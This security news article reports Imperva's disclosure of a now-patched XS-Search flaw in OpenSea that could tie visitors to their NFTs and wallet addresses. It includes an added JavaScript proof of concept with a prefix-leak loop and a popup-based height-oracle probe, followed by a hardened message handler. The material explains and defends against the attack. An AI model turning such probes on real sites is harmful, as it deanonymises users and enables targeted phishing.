Imperva uncovers vulnerabilities in NFT marketplace OpenSea

Imperva’s threat research team has announced that it uncovered a vulnerability affecting OpenSea, the largest non-fungible token (NFT) marketplace, a company valued at $13.3 billion.

Imperva researchers demonstrated how an attacker could exploit a cross-site search vulnerability to reveal a user’s identity: whatever the attacker’s own site already knows about a visitor (an IP address, a browser session, or an email address) could be linked to a specific NFT and, through it, to the visitor’s wallet address.

Given the premium placed on anonymity in the NFT realm, this type of exploitation could have seriously affected OpenSea’s business, potentially enabling an attacker to conduct targeted phishing attacks or track which users have purchased high-value NFTs. Imperva notified OpenSea of the vulnerability, and the company quickly released an update that limits cross-origin communication, reducing the risk of further exploitation. The Imperva Red Team validated the fix.

The root cause was a misconfiguration of the open source iFrame-resizer library used by OpenSea, which created the cross-site search condition that could expose user identities. The researchers also inferred that OpenSea’s search runs on Elasticsearch, after seeing the company ask for Elasticsearch skills in a job advertisement.

Cross-site search (XS-Search) is a class of web vulnerability, one of the XS-Leaks, affecting applications that expose query-based search. It lets an attacker’s page extract information belonging to another origin by issuing search queries on the victim’s behalf (the victim’s browser attaches its cookies, so the queries run as the victim) and observing some side channel, such as response timing, page size or frame count, that differs between a query that returns results and one that does not. Each query answers one yes/no question; by issuing many of them, for example extending a guessed prefix one character at a time and keeping each character that still yields results, the attacker reconstructs the secret incrementally.


OpenSea did not restrict cross-origin communication, which is what made the cross-site search attack possible. The iFrame-resizer library broadcasts the width and height of the page via cross-window messages, and that broadcast serves as the “oracle”: the page is shorter when a search returns zero results, so the reported height tells the attacker whether a query matched. By repeatedly searching the victim’s assets cross-origin, through a tab or popup, an attacker can leak the name of an NFT created by the user; the NFT’s public page then reveals the creator’s wallet address. That chain links whatever identity the attacker’s site holds for the visitor to the leaked NFT and to the public wallet address.
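The following is an added example, not code from OpenSea, Imperva or the iFrame-resizer project, that models the two passages above: the generic XS-Search prefix-extraction loop and the page-height oracle, followed by an illustrative hardened message handler of the kind "limiting cross-origin communication" implies. It assumes (my assumptions, not statements from the article) that the victim page’s resizer script replies to whichever window sent it an `[iFrameSizer]` init message, that it reports its size as `[iFrameSizer]<id>:<height>:<width>:<type>`, that a zero-result search renders a shorter page, and that the search engine matches name prefixes. `searchUrlFor`, the init message contents and the asset names are hypothetical; the browser probe is shown for completeness and only the sans-I/O logic runs offline.

```javascript
// Added example (not OpenSea's, Imperva's or iframe-resizer's code). Assumptions
// are mine, not from the article: the victim page's resizer script answers the
// window that sent it an "[iFrameSizer]" init message, reports
// "[iFrameSizer]<id>:<height>:<width>:<type>", renders a shorter page for zero
// results, and the search matches name prefixes.
const IFRAME_SIZER_PREFIX = '[iFrameSizer]';

// Parse one size broadcast; anything else returns null.
function parseSizeMessage(data) {
  if (typeof data !== 'string' || !data.startsWith(IFRAME_SIZER_PREFIX)) return null;
  const [id, height, width, type] = data.slice(IFRAME_SIZER_PREFIX.length).split(':');
  const h = Number(height), w = Number(width);
  if (!Number.isFinite(h) || !Number.isFinite(w)) return null;
  return { id, height: h, width: w, type };
}

// The oracle: a page with hits is taller than the measured "no results" page.
function hasResults(size, emptyHeight) {
  return size.height > emptyHeight;
}

// Sans-I/O prefix extraction: yields the next query to probe, receives true/false
// ("did that query return results"), and returns the longest matching prefix.
// Keeping the transport out lets tests drive it synchronously and a browser with await.
function* prefixLeak(alphabet, maxLen) {
  let prefix = '';
  while (prefix.length < maxLen) {
    let extended = false;
    for (const ch of alphabet) {
      const hit = yield prefix + ch;     // one cross-origin probe per candidate char
      if (hit) { prefix += ch; extended = true; break; }
    }
    if (!extended) break;                // nothing extends the prefix: name complete
  }
  return prefix;
}

function driveSync(gen, probe) {
  let step = gen.next();
  while (!step.done) step = gen.next(probe(step.value));
  return step.value;
}

async function driveAsync(gen, probe) {
  let step = gen.next();
  while (!step.done) step = gen.next(await probe(step.value));
  return step.value;
}

// Constructed victim data (sample names, not real): NFTs this user created.
const VICTIM_ASSETS = ['Bored Otter #7', 'Bored Otter #8', 'Pixel Fox'];
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789# ';

// Simulated prefix-matching search backend standing in for the real service.
function simulatedProbe(query) {
  const q = query.toLowerCase();
  return VICTIM_ASSETS.some((name) => name.toLowerCase().startsWith(q));
}

// Offline demonstration: greedy prefix walk recovers the first matching name.
function demoLeak() {
  return driveSync(prefixLeak(ALPHABET, 32), simulatedProbe);
}

// Browser probe (only meaningful in a browser; searchUrlFor and initMessage are
// hypothetical, the init field layout is library-version specific): open the
// victim's search cross-origin, send the init message so the page reports back to
// us, and resolve on the first size broadcast.
function browserProbe(searchUrlFor, emptyHeight, initMessage) {
  return (query) => new Promise((resolve) => {
    let popup = null;
    const onMessage = (ev) => {
      const size = parseSizeMessage(ev.data);
      if (!size) return;
      window.removeEventListener('message', onMessage);
      popup.close();
      resolve(hasResults(size, emptyHeight));
    };
    window.addEventListener('message', onMessage);
    popup = window.open(searchUrlFor(query));
    setTimeout(() => popup.postMessage(initMessage, '*'), 1500); // give the page time to load
  });
}

// Hardening (illustrative, not OpenSea's actual patch): report size only to an
// allow-listed origin, and reply to that origin explicitly, never to '*'.
function makeSizeReporter(allowedOrigins, measure) {
  return (event) => {
    if (!allowedOrigins.includes(event.origin)) return null;   // ignore strangers
    if (typeof event.data !== 'string' || !event.data.startsWith(IFRAME_SIZER_PREFIX)) return null;
    const { height, width } = measure();
    const reply = `${IFRAME_SIZER_PREFIX}page:${height}:${width}:init`;
    event.source.postMessage(reply, event.origin);             // explicit targetOrigin
    return reply;
  };
}
```

In a real run the alphabet would cover the characters OpenSea allows in names, the `emptyHeight` baseline would be measured once with a query known to match nothing, and each probe costs a popup, so the attack is slow but needs only one yes/no bit per query. The hardened reporter shows the two checks that close the channel from the victim side: validate `event.origin` on the way in and pass an explicit `targetOrigin` on the way out.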

This example highlights the ongoing challenges companies face in ensuring security in increasingly complex application environments, where misconfigurations are easily overlooked and exploited, especially in newer decentralized app environments.

“The world of Web3 and decentralized applications (dApps) is expanding rapidly, bringing with it a host of new opportunities and challenges. As the popularity of dApps increases, so does the potential for security breaches and vulnerabilities,” said Ron Masas, a security researcher at Imperva.

“Recent years have seen several high-profile hacks and vulnerabilities affecting popular Web3 platforms, highlighting the need for developers to prioritize security and privacy. From the infamous DAO hack on the Ethereum blockchain to more recent hacks targeting cross-chain bridging, it is clear that the security of Web3 applications must be a top priority.”

“The vulnerability discovered in OpenSea highlights the dangers of cross-origin communication, which can lead to XS leaks and other vulnerabilities. We appreciate OpenSea’s quick response in addressing the vulnerability and working with us to mitigate it. Our team is dedicated to identifying and reporting vulnerabilities and working with software vendors to improve the safety and security of their platforms,” he concludes.
